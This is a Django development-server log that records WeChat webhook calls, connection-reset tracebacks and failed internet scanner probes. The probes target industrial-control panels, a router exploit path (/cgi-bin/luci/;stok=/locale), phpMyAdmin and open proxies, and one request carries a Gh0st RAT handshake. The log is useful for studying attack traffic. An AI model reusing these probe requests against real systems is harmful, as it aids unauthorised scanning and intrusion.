Watching for file changes with StatReloader
[21/Aug/2019 03:30:44] "POST /wechat?signature=6017ae8d5a217261d973b362f904e398ed22c5e9&timestamp=1566358244&nonce=719590173&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 230
[21/Aug/2019 03:30:59] "POST /wechat?signature=0680fecc7c85a7ea2de3d43df0565e63daec163d&timestamp=1566358259&nonce=759899232&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 226
[21/Aug/2019 03:31:22] "POST /wechat?signature=bb4f23d4b8607b7cadc136d4edc73b8f38ae6bf5&timestamp=1566358282&nonce=1257416861&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 228
[21/Aug/2019 03:31:25] "POST /wechat?signature=2d7b08edebec42eeceebc038841df194a1a81a98&timestamp=1566358285&nonce=238269660&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 227
[21/Aug/2019 03:31:26] "POST /wechat?signature=ae547e51af47815f7b22a38d4ada108fe3d7ec92&timestamp=1566358286&nonce=534771181&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 228
[21/Aug/2019 03:31:30] "POST /wechat?signature=63f0e2ee7dce3171047c6cc91cc0ee6171109bf6&timestamp=1566358290&nonce=967070327&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 229
[21/Aug/2019 03:32:02] "POST /wechat?signature=47a467e607827360ea29446264420cb0e1bda771&timestamp=1566358322&nonce=212447388&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 7
[21/Aug/2019 03:32:13] "POST /wechat?signature=d405584347d2f487e94654e9b5478bf56d1ae7a5&timestamp=1566358333&nonce=1314937007&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 226
Watching for file changes with StatReloader
Watching for file changes with StatReloader
[21/Aug/2019 04:15:45] "POST /wechat?signature=03463f774f79383817d14d1259de4709d62980de&timestamp=1566360945&nonce=923347303&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 226
[21/Aug/2019 04:15:58] "POST /wechat?signature=5f7ce48a1ce2e85b3148d20aa65fcbb892a6db98&timestamp=1566360958&nonce=127059090&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 226
[21/Aug/2019 04:21:33] "POST /wechat?signature=bafd2caad94555a942e74a3ad2bcf252cd193a02&timestamp=1566361293&nonce=1313024994&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 226
[21/Aug/2019 04:37:39] "POST /wechat?signature=d21e91c3ff322e4d0f9bcd6c55f6fdb4107dd3ea&timestamp=1566362259&nonce=1624378719&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 227
[21/Aug/2019 04:40:23] "GET / HTTP/1.1" 200 84
Not Found: /navigation.html
[21/Aug/2019 04:40:23] "GET /navigation.html HTTP/1.1" 404 2291
[21/Aug/2019 04:40:23] "GET / HTTP/1.1" 200 84
[21/Aug/2019 04:40:23] "GET / HTTP/1.1" 200 84
----------------------------------------
Exception happened during processing of request from ('180.167.210.6', 54768)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 171, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 179, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /KingViewWeb/
[21/Aug/2019 04:40:24] "GET /KingViewWeb/ HTTP/1.1" 404 2282
----------------------------------------
Exception happened during processing of request from ('180.167.210.6', 55034)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 171, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 179, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /webconfig.ini
[21/Aug/2019 04:40:24] "GET /webconfig.ini HTTP/1.1" 404 2285
----------------------------------------
Exception happened during processing of request from ('180.167.210.6', 55236)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 171, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 179, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('180.167.210.6', 54110)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 171, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 179, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[21/Aug/2019 04:40:27] "GET / HTTP/1.1" 200 84
Not Found: /fx_plcinf.html
[21/Aug/2019 04:40:28] "GET /fx_plcinf.html?CMD=Monitor%20Start&LANG=EN HTTP/1.1" 404 2320
Not Found: /ifixwebspace/
[21/Aug/2019 04:40:28] "GET /ifixwebspace/ HTTP/1.1" 404 2285
[21/Aug/2019 04:40:28] "GET / HTTP/1.1" 200 84
----------------------------------------
Exception happened during processing of request from ('180.167.210.6', 59898)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 171, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 179, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /cgi-bin/luci/;stok=/locale
[21/Aug/2019 04:40:28] "POST /cgi-bin/luci/;stok=/locale?form=lang HTTP/1.1" 404 2339
----------------------------------------
Exception happened during processing of request from ('180.167.210.6', 59900)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 171, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 179, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[21/Aug/2019 04:46:03] "POST /wechat?signature=e949174234b06cc2a6626f9d78510fcbaaeeec0d&timestamp=1566362763&nonce=1679196197&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 226
[21/Aug/2019 05:48:20] "GET / HTTP/1.1" 200 84
[21/Aug/2019 05:51:11] "GET / HTTP/1.1" 200 84
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[21/Aug/2019 05:51:11] "GET / HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('178.128.170.60', 50368)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 116, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 194, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 111, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
[21/Aug/2019 05:54:54] "GET / HTTP/1.1" 200 84
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[21/Aug/2019 05:54:54] "GET / HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('159.65.175.107', 55498)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 116, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 194, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 111, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
[21/Aug/2019 05:54:55] "GET / HTTP/1.1" 200 84
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[21/Aug/2019 05:54:55] "GET / HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('178.128.170.60', 35922)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 116, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 194, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 111, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
[21/Aug/2019 05:55:39] "GET / HTTP/1.1" 200 84
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[21/Aug/2019 05:55:39] "GET / HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('181.41.215.112', 65029)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 116, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 194, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 111, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
Not Found: /http://www.jiujue.shop/
[21/Aug/2019 05:55:40] "GET /http%3A%2F%2Fwww%2Ejiujue%2Eshop%2F HTTP/1.1" 404 2316
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[21/Aug/2019 05:55:40] "GET /http%3A%2F%2Fwww%2Ejiujue%2Eshop%2F HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('181.41.215.112', 65039)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 116, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 169, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 194, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 111, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
Not Found: /index.html
[21/Aug/2019 07:32:02] "GET /index.html HTTP/1.1" 404 2276
[21/Aug/2019 09:33:55] "POST /wechat?signature=22c19259fbd9cf264f70cbf83b9d4ae06e25b3f0&timestamp=1566380035&nonce=646649758&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 233
[21/Aug/2019 09:34:00] "POST /wechat?signature=bb64d91a25d5bef69e2a058a062a002b49e28f01&timestamp=1566380040&nonce=1240924668&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 227
[21/Aug/2019 09:34:05] "POST /wechat?signature=e67770f82cf12660b66693fa29d479319201392f&timestamp=1566380045&nonce=1168702734&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 236
Not Found: /http:/clientapi.ipip.net/echo.php
[21/Aug/2019 09:47:42] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1729
Not Found: /phpmyadmin/
[21/Aug/2019 10:41:07] "GET /phpmyadmin/ HTTP/1.1" 404 2279
----------------------------------------
Exception happened during processing of request from ('118.97.250.243', 33098)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 171, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 179, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[21/Aug/2019 11:39:12] code 400, message Bad request syntax ("Gh0st\xad\x00\x00\x00à\x00\x00\x00x\x9cKS``\x98ÃÀÀÀ\x06Ä\x8c@¼Q\x96\x81\x81\tH\x07§\x16\x95e&§*\x04$&g+\x182\x94ö°00¬¨rc\x00\x01\x11\xa0\x82\x1f\\`&\x83ÇK7\x86\x19ån\x0c9\x95n\x0c;\x84\x0f3¬èsch¨^Ï4'J\x97©\x82ã0Ã\x91h]&\x90øÎ\x97SËA4L?2=áÄ\x92\x86\x0b@õ`\x0cT\x1f®¯]")
[21/Aug/2019 11:39:12] "Gh0st­   à   xKS``ÃÀÀÀÄ@¼Q	H§e&§*$&g+2ö°00¬¨rc  \`&ÇK7ån9n;3¬èsch¨^Ï4'J©ã0Ãh]&øÎSËA4L?2=áÄ@õ`T®¯]" 400 -
Not Found: /http:/www.baidu.com/cache/global/img/gs.gif
[21/Aug/2019 11:58:55] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1738
Watching for file changes with StatReloader
[21/Aug/2019 13:39:56] "POST /wechat?signature=6fcbac23c642ed84a8f3b1d856f4f0673ccd1d6e&timestamp=1566394796&nonce=1536659154&openid=ozyx8jpRr1pvj8KBadhJN--WhzaA HTTP/1.1" 200 239
